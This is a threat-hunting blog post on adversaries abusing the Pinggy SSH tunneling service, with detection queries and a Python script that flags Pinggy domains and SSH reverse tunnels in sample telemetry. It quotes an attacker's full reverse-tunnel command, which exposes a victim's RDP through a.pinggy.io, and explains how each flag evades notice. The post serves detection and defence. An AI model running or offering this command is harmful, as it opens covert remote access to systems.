186. Pinggy: Another Tunneling Solution Abused by Adversaries

Hello everyone!

Have you read CrowdStrike's recent report on SCATTERED SPIDER activity? If not, make sure you do! It contains lots of valuable information on the adversary's tactics, techniques and procedures.

One of them is abusing Pinggy, another privacy-focused tunneling solution. What makes it interesting is that the threat actors don't even have to drop a Pinggy binary on the compromised system: Pinggy tunnels are set up over SSH, so the SSH client already present on the host (for example, the built-in OpenSSH client on Windows) is enough:

ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io

A few things are worth noting in that command line: -p 443 connects to Pinggy's SSH endpoint on the HTTPS port, so the session blends with ordinary outbound web traffic; -R0:127.0.0.1:3389 asks the Pinggy server to allocate a listener (port 0 means "pick any free port") and forward whatever connects to it back to RDP on the victim; -o StrictHostKeyChecking=no suppresses the host key prompt so the command runs non-interactively, and -o ServerAliveInterval=30 keeps the idle tunnel from being torn down. Since the Pinggy endpoint hostname has to appear as the SSH target, the first thing to hunt for is "pinggy" in the command line:

event_type: "processcreatewin"

AND

cmdline: "pinggy"

Another opportunity is hunting for Pinggy-related domains. Make sure the match covers subdomains such as a.pinggy.io (the endpoint seen in the command above), not only the apex names:

event_type: "dnsreq"

AND

dns_rname: ("pinggy.io" OR "pinggy.link")
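To show both hunts running over telemetry, here is an added example (my code, not from the original post or from CrowdStrike) that applies the "pinggy in cmdline" and Pinggy-domain checks to constructed sample events shaped like the fields above, and generalizes the command-line hunt to any SSH reverse tunnel (-R) towards an external host, with SSH over port 443 as an extra signal, so that the same logic catches a different tunneling provider. The event records, hostnames such as tunnel.example.net and jumphost.corp.example, and the tokens are all made up for the example.

```python
import re
import shlex

# Constructed sample telemetry (not real incident data): records mimic the
# event_type / cmdline / dns_rname fields used by the hunting queries above.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "cmdline":
        "ssh.exe -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no "
        "-o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io"},
    {"event_type": "processcreatewin", "cmdline":
        r'"C:\Windows\System32\OpenSSH\ssh.exe" -p 443 -R0:localhost:22 '
        r'-o StrictHostKeyChecking=no user+tcp@a.pinggy.io'},
    {"event_type": "processcreatewin", "cmdline":
        "ssh.exe -p 22 jdoe@jumphost.corp.example"},          # benign admin ssh
    {"event_type": "processcreatewin", "cmdline":
        "ssh.exe -p 443 -R 0:127.0.0.1:3389 -o StrictHostKeyChecking=no "
        "tcp@tunnel.example.net"},                            # hypothetical other provider
    {"event_type": "dnsreq", "dns_rname": "a.pinggy.io"},
    {"event_type": "dnsreq", "dns_rname": "free.pinggy.link"},
    {"event_type": "dnsreq", "dns_rname": "notpinggy.io"},   # look-alike, must not match
    {"event_type": "dnsreq", "dns_rname": "www.example.com"},
]

PINGGY_DOMAINS = ("pinggy.io", "pinggy.link")


def is_pinggy_domain(name):
    """True for the apex or any subdomain of the Pinggy zones, never for look-alikes."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in PINGGY_DOMAINS)


def parse_ssh_reverse_tunnel(cmdline):
    """Return {remote_host, port, forwards} if cmdline is an ssh client invocation
    with at least one remote port forward (-R); otherwise None.

    posix=False keeps Windows backslash paths intact; surrounding quotes are stripped.
    """
    try:
        argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if not argv or not re.search(r"(^|[\\/])ssh(\.exe)?$", argv[0], re.I):
        return None
    port, forwards, target = "22", [], None
    i = 1
    while i < len(argv):
        a = argv[i]
        if a == "-p" and i + 1 < len(argv):          # "-p 443"
            port = argv[i + 1]; i += 2; continue
        if a.startswith("-p") and len(a) > 2:        # "-p443"
            port = a[2:]; i += 1; continue
        if a == "-R" and i + 1 < len(argv):          # "-R 0:127.0.0.1:3389"
            forwards.append(argv[i + 1]); i += 2; continue
        if a.startswith("-R") and len(a) > 2:        # "-R0:127.0.0.1:3389"
            forwards.append(a[2:]); i += 1; continue
        if a == "-o" and i + 1 < len(argv):          # "-o Option=value" takes an argument
            i += 2; continue
        if a.startswith("-"):                        # any other flag
            i += 1; continue
        target = a                                   # first non-flag word: [user@]host
        i += 1
    if not forwards or target is None:
        return None
    return {"remote_host": target.rsplit("@", 1)[-1], "port": port, "forwards": forwards}


def hunt(events):
    """Apply both hunts from the post plus the provider-agnostic reverse-tunnel check.

    Returns a list of (reasons, matched_value) tuples in event order.
    """
    hits = []
    for ev in events:
        if ev.get("event_type") == "processcreatewin":
            cmd = ev.get("cmdline", "")
            reasons = []
            if "pinggy" in cmd.lower():
                reasons.append("pinggy_in_cmdline")
            tun = parse_ssh_reverse_tunnel(cmd)
            if tun:
                reasons.append("ssh_reverse_tunnel")
                if tun["port"] == "443":
                    reasons.append("ssh_over_443")
            if reasons:
                hits.append((reasons, cmd))
        elif ev.get("event_type") == "dnsreq":
            name = ev.get("dns_rname", "")
            if is_pinggy_domain(name):
                hits.append((["pinggy_domain"], name))
    return hits


if __name__ == "__main__":
    for reasons, value in hunt(SAMPLE_EVENTS):
        print(", ".join(reasons), "->", value)
```

The plain `ssh -R` signal will fire on legitimate administrator usage, so in practice it is a triage aid rather than an alert on its own; the combination with port 443 and an external target host is what narrows it down, and the explicit "pinggy" string and domain matches remain the high-fidelity hunts from the post.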

See you tomorrow!
